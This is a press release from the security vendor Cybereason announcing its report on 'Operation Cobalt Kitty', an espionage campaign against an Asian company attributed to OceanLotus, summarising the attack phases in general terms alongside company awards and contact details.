Cybereason Discovers Large-scale Corporate Espionage Hacking Operation

Share Article

Cybereason Uncovered a Massive and Wide Scale Advanced Cyber Attack Against a Prominent Corporation in Asia Being Carried Out by the Hacking Group OceanLotus. Details in Cybereason's Research Show the Cat and Mouse Game That Occurred Between the Company and the Hackers.

Cybereason, developers of the most effective Total Endpoint Protection Platform including EDR & NGAV, today released a report reviewing a massive, cyber espionage advanced persistent threat (APT), named Operation Cobalt Kitty. The APT, carried out by the hacking group OceanLotus, targeted a global company based in Asia with the goal of stealing proprietary business information.

“Operation Cobalt Kitty provides a fascinating deep look at the specific tactics, tools and techniques used by OceanLotus to carry out a sophisticated, persistent, large scale attack against a global company. Interestingly, once the Cybereason technology was deployed across the customer’s environment, the attack quickly became a game of cat and mouse between our security analysts and hackers. In our report we share rarely seen details on this type of attack with the broader security industry,” said Assaf Dahan, director, advanced security services, Cybereason.

The infection of the company’s network was initiated by a spear-phishing email campaign targeted at senior management in the company.

Operation Cobalt Kitty included four attack phases observed by Cybereason’s security analysts, whom were called to investigate the company after it’s IT department suspected that their network was breached but was having a hard time tracing the source of the attack.

Phase One: Fileless operation (PowerShell and Cobalt Strike payloads)
Based on the forensic evidence collected from the victim environment, the original attack began about a year before Cybereason was deployed on the environment. During that phase, the threat actor operated a fileless PowerShell-based infrastructure, using customized PowerShell payloads taken from known offensive frameworks such as Cobalt Strike, PowerSploit and Nishang.

Phase Two: Using DLL hijacking and DNS tunneling
During the second phase of the attack, the attackers introduced two stealthy backdoors that they attempted to deploy on selected targets. The introduction of the back doors is a key turning point in the investigation since it demonstrated the threat actor’s resourcefulness and skill set.

At the time of the attack, these back doors were undetected and undocumented by any security vendor. Recently, Kaspersky researchers identified a variant of one of the back doors as Backdoor.Win32.Denis.

Phase Three: Introduction of a Novel Outlook Back Door and Lateral Movement Spree
In the third phase of the operation, the attackers harvested credentials stored on the compromised machines and performed lateral movement and infected new machines. The attackers also introduced a stealthy technique to communicate with their servers and exfiltrate data using Microsoft Outlook. In a relentless attempt to remain undetected, the attackers devised a very stealthy C2 channel that is very hard to detect since it leverages an email-based C2 channel. The attackers installed a back door macro in Microsoft Outlook that enabled them to execute commands, deploy their tools and steal valuable data from the compromised machines.

Phase Four: New Arsenal and Attempt to Restore PowerShell Infrastructure
After a four week lull and no apparent malicious activity, the attackers returned to the scene and introduced new and improved tools aimed at bypassing the security mitigations that were implemented by the company’s IT team. These tools and methods mainly allowed them to bypass the PowerShell execution restrictions and password dumping mitigations.

Cybereason uncovered a compromised server that was used as the main attacking machine, where they stored their arsenal in a network share, which made it easier to spread their tools to other machines on the network.

Cybereason has also been the recipient of many industry awards and is regularly recognized by leading news organizations and outlets for outstanding product innovation.

Significant Awards
JMP Securities Super 60 Company to Watch
2017 EY Entrepreneur Semi-finalist Lior Div, CEO
2017 CRN Security 100: ‘20 Coolest Endpoint Security Companies’
‘Best Places to Work 2016’, Boston Business Journal
2017 Built in Boston 50 to Watch List (the only security company on the list)
2017 Cyber Excellence Awards ‘Most Innovative Cybersecurity Company’
2017 Cyber Defense Magazine Award for ‘Cutting Edge Endpoint Security Solution’
2016 EY Entrepreneur of Year Finalist Lior Div, CEO

About Cybereason
Cybereason is the leader in endpoint protection, offering endpoint detection and response, next-generation antivirus, and managed monitoring services. Founded by elite intelligence professionals born and bred in offense-first hunting, Cybereason gives enterprises the upper hand over cyber adversaries. The Cybereason platform is powered by a custom-built in-memory graph, the only truly automated hunting engine anywhere. It detects behavioral patterns across every endpoint and surfaces malicious operations in an exceptionally user-friendly interface. Cybereason is privately held and headquartered in Boston with offices in London, Tel Aviv, and Tokyo.

For more information, please visit:


Media Contact:
Bill Keeler
Director, Public Relations
(929) 259-3261

Share article on social media or email:

View article via:

Pdf Print

Contact Author

Bill Keeler
+1 929 259-3261
Email >